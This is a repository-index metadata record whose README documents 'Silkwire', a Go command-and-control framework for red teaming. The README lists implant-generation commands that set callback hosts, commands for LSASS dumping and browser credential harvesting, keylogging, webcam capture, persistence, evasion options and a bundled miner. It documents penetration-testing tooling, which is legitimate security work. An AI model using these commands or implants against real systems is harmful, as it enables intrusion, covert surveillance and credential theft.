{"id":47837851,"url":"https://github.com/projektckmt/silkwire-c2","last_synced_at":"2026-04-03T20:34:42.023Z","repository":{"id":326260126,"uuid":"1103216146","full_name":"projektckmt/silkwire-c2","owner":"projektckmt","description":"C2 framework","archived":false,"fork":false,"pushed_at":"2026-02-13T23:08:48.000Z","size":49186,"stargazers_count":8,"open_issues_count":0,"forks_count":1,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-02-14T05:21:30.125Z","etag":null,"topics":["c2-framework","command-and-control","golang","malware-development","penetration-testing","post-exploitation","red-team"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/projektckmt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-11-24T15:24:49.000Z","updated_at":"2026-01-09T14:22:44.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/projektckmt/silkwire-c2","commit_stats":null,"previous_names":["projektckmt/silkwire-c2"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/projektckmt/silkwire-c2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/projektckmt%2Fsilkwire-c2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/projektckmt%2Fsilkwire-c2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/projektckmt%2Fsilkwire-c2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/projektckmt%2Fsilkwire-c2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/projektckmt","download_url":"https://codeload.github.com/projektckmt/silkwire-c2/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/projektckmt%2Fsilkwire-c2/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31375769,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-03T17:53:18.093Z","status":"ssl_error","status_checked_at":"2026-04-03T17:53:17.617Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c2-framework","command-and-control","golang","malware-development","penetration-testing","post-exploitation","red-team"],"created_at":"2026-04-03T20:34:41.930Z","updated_at":"2026-04-03T20:34:42.003Z","avatar_url":"https://github.com/projektckmt.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Silkwire C2 Framework\n\n\u003cp align=\"center\"\u003e\n \u003cimg alt=\"Silkwire Logo\" src=\"docs/images/silkwire.png\" height=\"30%\" width=\"30%\"\u003e\n\u003c/p\u003e\n\nA gRPC-based Command and Control framework for authorized penetration testing and red team operations. Features multi-platform implants, post-exploitation modules, and comprehensive evasion capabilities.\n\n\u003e **⚠️ LEGAL DISCLAIMER**\n\u003e **FOR AUTHORIZED SECURITY TESTING ONLY.** This tool is intended solely for authorized penetration testing, red team exercises, and educational purposes. Unauthorized use against systems you don't own or have explicit permission to test is illegal and unethical. Users are solely responsible for compliance with all applicable laws.\n\n## Features\n\n**Core Infrastructure**\n- Encrypted gRPC communication (TLS/mTLS) with bidirectional streaming\n- Multi-platform support: Windows, Linux, macOS (amd64, 386, arm64)\n- Dynamic implant generation with custom configurations\n- Interactive operator console with session management\n- SQLite-based persistence\n\n**Post-Exploitation**\n- In-memory .NET assembly execution (AMSI/ETW bypass)\n- PE/DLL execution via Donut shellcode conversion\n- BOF (Beacon Object File) execution with goffloader\n- Multiple shellcode injection techniques\n- Process migration and token manipulation\n- Credential harvesting (LSASS, browsers, SAM/shadow)\n- Persistence mechanisms (registry, scheduled tasks, services, cron, systemd, launchd)\n\n**Surveillance**\n- Keylogging with window tracking\n- Screenshot, audio, and webcam capture\n- Clipboard monitoring\n\n**Networking**\n- SOCKS5 proxy and port forwarding\n- DNS C2 channel with encryption\n- Interactive PTY shells\n\n**Evasion**\n- Anti-debug, anti-VM, anti-emulation\n- Sleep masking and code obfuscation\n- Jittered beacons and kill dates\n- Configurable evasion profiles\n\n## Quick Start\n\n### Prerequisites\n- Go 1.24.4+\n- Protocol Buffers (`protoc` with Go plugins)\n- OpenSSL\n- SQLite3\n\n```bash\n# Clone and setup\ngit clone https://github.com/projektckmt/silkwire-c2.git\ncd silkwire-c2\nmake dev-setup\n\n# Build all components\nmake build\n```\n\n### Running\n\n**Terminal 1 - Server:**\n```bash\nmake run-server\n```\n\n**Terminal 2 - Operator Console:**\n```bash\nmake run-console\n```\n\n**Terminal 3 - Generate and Run Implant:**\n```bash\n# In the console, generate an implant\ngenerate --mtls \u003cserver-address\u003e --os \u003ctarget-os\u003e --arch \u003ctarget-arch\u003e\n\n# Run the generated implant binary\n./path/to/generated/implant\n```\n\nFor detailed setup and manual execution options, see the [documentation](docs/).\n\n## Usage\n\n### Basic Commands\n\n```bash\n# Session management\nsessions # List all sessions\nuse \u003cid\u003e # Enter interactive session mode\nsession \u003cid\u003e # Alias for 'use'\nkill \u003cid\u003e # Terminate session\n\n# Command execution (in session mode)\nshell [command] # Execute command or start interactive PTY\nupload \u003clocal\u003e \u003cremote\u003e # Upload file\ndownload \u003cremote\u003e \u003clocal\u003e # Download file\n\n# Post-exploitation (in session mode)\nexecute-assembly \u003cpath\u003e [args] # .NET assembly execution\nexecute-pe \u003cpath\u003e [args] # PE/DLL via Donut\nexecute-bof \u003cpath\u003e [args] # BOF execution (Win x64)\nexecute-shellcode \u003cfile\u003e # Shellcode injection\nmigrate \u003cpid\u003e # Process migration\n\n# Credentials (in session mode)\nlsass # LSASS dump (Windows)\nhashdump # Hash extraction (SAM/shadow)\nharvest \u003cchrome|firefox|edge|all\u003e # Browser credentials\n\n# Surveillance (in session mode)\nkeylog start # Start keylogger\nkeylog stop # Stop keylogger\nscreenshot # Capture screenshot\naudio [duration] # Record audio (default: 5s)\nwebcam \u003cphoto|video\u003e [duration] # Capture from webcam\n\n# Networking (in session mode)\nsocks start [port] # Start SOCKS5 proxy\nsocks stop # Stop SOCKS5 proxy\nportfwd add \u003cbind\u003e \u003chost\u003e \u003cport\u003e # Add port forward\nportfwd remove \u003cbind\u003e # Remove port forward\nportfwd list # List port forwards\n\n# Persistence (in session mode)\npersist install \u003cmethod\u003e # Install persistence (registry, task, service, cron, systemd, launchd)\npersist remove \u003cmethod\u003e # Remove persistence\npersist list # List persistence methods\n```\n\nFor complete command reference and advanced options, see the [operator guide](docs/OPERATOR_GUIDE.md).\n\n## Architecture\n\n### Components\n\n```\n┌─────────────┐ gRPC/TLS ┌─────────────┐\n│ Implant │◄──────────────────────────►│ Server │\n│ (Target) │ Bidirectional Stream │ (Handler) │\n└─────────────┘ └──────┬──────┘\n │\n ┌─────▼──────┐\n │ Console │\n │ (Operator) │\n └────────────┘\n```\n\n- **Server** ([server/](server/)): gRPC server, session management, task queuing, implant generation\n- **Implant** ([implant/](implant/)): Multi-platform agent with post-exploitation and evasion modules\n- **Console** ([console/](console/)): Interactive operator interface\n- **Proto** ([proto/](proto/)): gRPC service and message definitions\n\n### Security\n\n- **Communication**: TLS 1.2+, mTLS support, session tokens\n- **Evasion**: Anti-debug/VM/emulation, sleep masking, process hiding\n- **Obfuscation**: String encryption, name mangling, control flow flattening\n\n## Advanced Capabilities\n\n### Implant Generation\nImplants are generated via the console CLI using templating to inject custom configurations:\n- Cross-platform compilation (Windows, Linux, macOS)\n- Custom configurations (beacon interval, jitter, kill date, evasion level)\n- Per-implant TLS certificates\n- Multiple output formats (EXE, DLL, shellcode, service)\n- Optional obfuscation and packing\n\n### Injection \u0026 Execution\n- **.NET Assemblies**: In-memory execution with AMSI/ETW bypass via donut shellcode or CLR hosting\n- **PE/DLL**: Server-side donut conversion with sacrificial process spawning\n- **BOF**: In-process execution using goffloader (Windows x64)\n- **Shellcode**: Multiple injection methods (CreateRemoteThread, RtlCreateUserThread, QueueUserAPC, reflective DLL)\n- **Process Migration**: Migrate implant with connection preservation\n\n### Covert Channels\n- **DNS C2**: Tunneling over DNS with TOTP auth and Age encryption\n- **SOCKS5**: Full proxy server for traffic pivoting\n- **Port Forwarding**: Multiple simultaneous forwards\n\n### Modules\nExtensible module system with built-in XMRig cryptocurrency miner. Custom modules can be added via the Module interface.\n\n## Development\n\n### Implant Generation\n\nImplants are generated using the console CLI, which uses templating to customize the implant code based on your configuration:\n\n```bash\n# In the operator console\ngenerate [transport] [options]\n\n# Basic examples:\ngenerate --mtls 192.168.1.100:8443\ngenerate --https example.com:443 --os windows --arch amd64\ngenerate --http 10.0.0.1:80 --format dll --evasion --garble\n\n# Advanced obfuscation:\ngenerate --mtls 10.0.0.1:8443 --obf-level 3\ngenerate --https cdn.example.com:443 --preset-heavy\ngenerate --mtls 10.0.0.1:8443 --string-obf --api-obf --sandbox-evasion\n```\n\n**Transport Options:**\n- `--mtls \u003caddress\u003e` - mTLS transport (default)\n- `--http \u003caddress\u003e` - HTTP transport\n- `--https \u003caddress\u003e` - HTTPS transport\n- `--dns \u003cdomain\u003e` - DNS transport\n\n**Build Options:**\n- `--os, -o \u003cos\u003e` - Target OS (windows, linux, darwin)\n- `--arch, -a \u003carch\u003e` - Target architecture (amd64, 386, arm64)\n- `--format, -f \u003cfmt\u003e` - Output format (exe, dll, shellcode, service, source)\n- `--save, -s \u003cdir\u003e` - Save to directory (default: ./)\n\n**Obfuscation \u0026 Evasion:**\n- `--evasion, -e` - Enable basic evasion techniques\n- `--garble, -g` - Use garble for code obfuscation\n- `--obf-level \u003c0-4\u003e` - Obfuscation level\n- `--preset-light|medium|heavy|extreme` - Quick presets\n- `--anti-vm`, `--anti-debug`, `--sandbox-evasion` - Advanced evasion\n\nThe console applies configuration templates to the implant source code and compiles the customized binary for the target platform.\n\n### Extending Functionality\n\n1. **Add Commands**: Edit `proto/c2.proto`, regenerate with `make proto`, implement handler in `implant/commands.go`\n2. **Custom Modules**: Implement Module interface in `implant/modules.go`, register, and add console commands\n3. **Testing**: `make test` or `go test ./...`\n\nSee [CONTRIBUTING.md](docs/CONTRIBUTING.md) for detailed development guidelines.\n\n## Operational Guidelines\n\n### Best Practices\n- **Authorization**: Obtain explicit written permission before deployment\n- **TLS**: Always use TLS/mTLS in production environments\n- **OpSec**: Set kill dates, configure jitter, use dedicated infrastructure\n- **Cleanup**: Remove persistence, delete binaries, clear artifacts after engagements\n- **Testing**: Validate evasion techniques in lab environments first\n\n### Troubleshooting\n- **Connection issues**: Check firewall rules, verify certificates, confirm server address\n- **Timeouts**: Increase beacon interval, verify implant process is running\n- **Build errors**: Run `make clean \u0026\u0026 make build`, ensure Go 1.24.4+, install protoc plugins\n\nSee [docs/TROUBLESHOOTING.md](docs/TROUBLESHOOTING.md) for detailed solutions.\n\n## License\n\nProvided for **educational and authorized security testing only**. Users must:\n- Only use on authorized systems\n- Comply with all applicable laws\n- Take full responsibility for their actions\n\nThe software is provided \"AS IS\" without warranty. Authors are not responsible for misuse.\n\n## Contributing\n\nContributions welcome! Please:\n- Maintain educational/research focus\n- Follow Go best practices\n- Include tests and documentation\n- Submit PRs with detailed descriptions\n\nReport security vulnerabilities privately to maintainers.\n\n## Acknowledgments\n\nInspired by Sliver, Metasploit, Cobalt Strike, and Empire. Built with gRPC, Protocol Buffers, go-clr, garble, donut, and XMRig.\n\n---\n\n**Use responsibly and legally.**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprojektckmt%2Fsilkwire-c2","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprojektckmt%2Fsilkwire-c2","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprojektckmt%2Fsilkwire-c2/lists"}